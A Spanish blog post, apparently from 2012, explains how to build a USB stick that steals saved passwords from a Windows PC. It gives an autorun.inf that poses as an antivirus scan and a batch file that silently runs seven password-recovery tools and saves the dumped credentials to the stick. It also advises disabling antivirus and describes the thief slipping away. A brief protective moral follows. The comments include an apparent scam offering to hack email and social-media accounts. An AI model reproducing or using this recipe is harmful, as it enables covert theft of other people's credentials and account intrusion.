• Navega al azar. Pulsa las flechas y deja que la fortuna te dispense un artículo.

    lunes, 6 de febrero de 2012

    Cómo consiguen robar contraseñas en Windows con un pendrive



    Robar las contraseñas del Messenger, correo y otros programas que corran en Windows puede ser tremendamente fácil si alguien accede a la máquina con un simple pendrive.

    Conocer el procedimiento puede que te haga más consciente de la necesidad de mantener unos mínimos de seguridad en tu PC con Windows.

    Así que te lo vamos a explicar.

    CÓMO HACKEAR CLAVES EN WINDOWS CON UN PENDRIVE


    Tan sencillo como conectar un pendrive a un puerto USB del ordenador de la víctima. Obviamente, el pendrive preparado de antemano con unas pocas utilidades y un par de modificaciones extremadamente sencillas.

    Windows suele guardar las contraseñas que se utilizan habitualmente para utilizar el Messenger, Outlook (cuentas de correo), sitios a los que entras a través de un navegador y muchas otras. Por eso nunca deberías dejar que tus contraseñas se guarden en una máquina con sistema operativo Windows si a ella podría acceder otra persona.


    Cualquier desaprensivo podría enchufar un pendrive equipado con los siguientes programas:

    MailPassView.- Recupera contraseñas de Outlook Express, Microsoft Outlook 2002/2003/2007/2010, Windows Mail, Windows Live Mail, IncrediMail, Eudora, Netscape 6.x/7.x (salvo que la contraseña esté encriptada con una clave maestra), Mozilla Thunderbird (lo mismo que el anterior), Group Mail Free, Yahoo! Mail (cuando la clave está guardada en la aplicación Messenger), Hotmail/MSN mail (si la clave está guardada en el Live Messenger) y Gmail (si la clave está guardada por Gmail Notifier application, Google Desktop o Google Talk).

    MessenPass.- Recupera contraseñas de MSN Messenger, Windows Messenger (en Windows XP), Windows Live Messenger (en Windows XP/Vista/7), Yahoo Messenger (versiones 5.x y 6.x), Google Talk, ICQ Lite 4.x/5.x/2003, AOL Instant Messenger v4.6 o menor, AIM 6.x, AIM Pro, Trillian, Trillian Astra, Miranda, GAIM/Pidgin, MySpace IM, PaltalkScene y Digsby.

    Protected Storage PassView.-  Recupera contraseñas de Outlook, Internet Explorer y MSN Explorer.

    IE PassView.- Recupera todas las contraseñas que guarde de cualquier forma el navegador Internet Explorer.

    PasswordFox.- Recupera todas las contraseñas guardadas en el navegador Mozilla Firefox.

    ChromePass.- Recupera todas las contraseñas guardadas en el navegador Chrome o Chromium.

    OperaPassView.- Recupera todas las contraseñas almacenadas en el navegador Opera.

    En cualquier caso estos programas no pueden recuperar contraseñas si están encriptadas mediante una clave maestra, razón de más para utilizar esta funcionalidad como medio de protección.



    ELABORACIÓN DEL PENDRIVE CON LAS HERRAMIENTAS


    Es necesario desactivar temporalmente el antivirus para configurar el pendrive pues se producen, a veces, falsos positivos con estas utilidades.

    1.- Descargar las 7 utilidades anteriores y copiar al pendrive solo los ejecutables (.exe).

    2.- En el bloc de notas escribir lo siguiente:

    [autorun]
    open=launch.bat
    ACTION= Ejecutar escaneado anti-virus
    Guardar y renombrar a autorun.inf (cuidado que no quede con extensión .txt sino .inf). Copiar el archivo al pendrive.

    3.- Crear otro archivo con el bloc de notas en el que se escribe lo siguiente:

    start mspass.exe /stext mspass.txt
    start mailpv.exe /stext mailpv.txt
    start iepv.exe /stext iepv.txt
    start pspv.exe /stext pspv.txt
    start PasswordFox.exe /stext PasswordFox.txt
    start ChromePass.exe /stext ChromePass.txt
    start OperaPassView.exe /stext OperaPassView.txt

    Controlar que los nombres de los ejecutables en este texto coincidan (mayúsculas y minúsculas) con los de los nombres de los correspondientes archivos.

    Guardar y renombrar a launch.bat 

    Copiar al pendrive.


    UTILIZACIÓN DEL PENDRIVE


    1.- Insertar el pendrive en un puerto USB. Como está configurado para auto-ejecutarse aparecerá una ventana emergente.

    2.- En la ventana seleccionar la primera opción: "Ejecutar escaneado anti-virus".

    3.- Las herramientas ahora estarán trabajando en un segundo plano de forma discreta y silenciosa. En realidad será cuestión de algunos segundos. Todas las contraseñas encontradas se almacenarán en archivos de texto en el propio pendrive.

    4.- Ahora viene la parte en la que se extrae el pendrive, se guarda en el bolsillo y se aleja el ladrón disimuladamente. Ya con toda tranquilidad podrá examinarlo en su casa. Encontrará en los archivos de texto las contraseñas, cuentas de email y otros datos relacionados.

    El asunto funciona perfectamente en Windows XP, Windows Vista y, las más de las veces, en Windows 7.


    MORALEJA:

    No dejes tu PC al alcance de cualquiera, procura no almacenar contraseñas en el disco duro o, si lo haces, que sea con algún procedimiento que las encripte. Lo de dejar de pensar en Windows y empezar a considerar, por ejemplo, Linux es también algo que deberías sopesar.


    5 comentarios:

    1. Mi nombre es Felipe Correa Vélez, Ingeniero de sistemas.

      Mi especialidad es para hakcear cuentas de HOTMAIL, FACEBOOK, YAHOO, MSN, GMAIL, TUENTI. Ofreczo un servicio muy eficaz brindando garantias para no generar desconfianzas.

      Tengo experiencia en estos casos.

      Mayor información me pueden contactar en mi cuenta de GMAIL, Favor contactarme con el país de procedencia.
      sistemasing12@gmail.com

      ResponderEliminar
    2. MENTIRAAAAAAAAAAA EL COMENTARIO DE ARRIBA ES UN INGENIERO QUE VALE CALLAAAAMPAA ! ESTAFADOR CSM ! sistemasing12@gmail.com

      ResponderEliminar
    3. porque no me funciona!!! quiero decir que no me aparece el de seleccionar el antivirus no corre automaticamente

      ResponderEliminar
    4. no funciona en windows 7 el autorun, porque en este sistema operativo fueron desactivas las funciones de "OPEN" y "ACTION" la unica manera es ejecutar manualmente el .bat o disfrazarlo en el momento de activarlo

      ResponderEliminar

    El Plus

    Conexiones



    El Twitter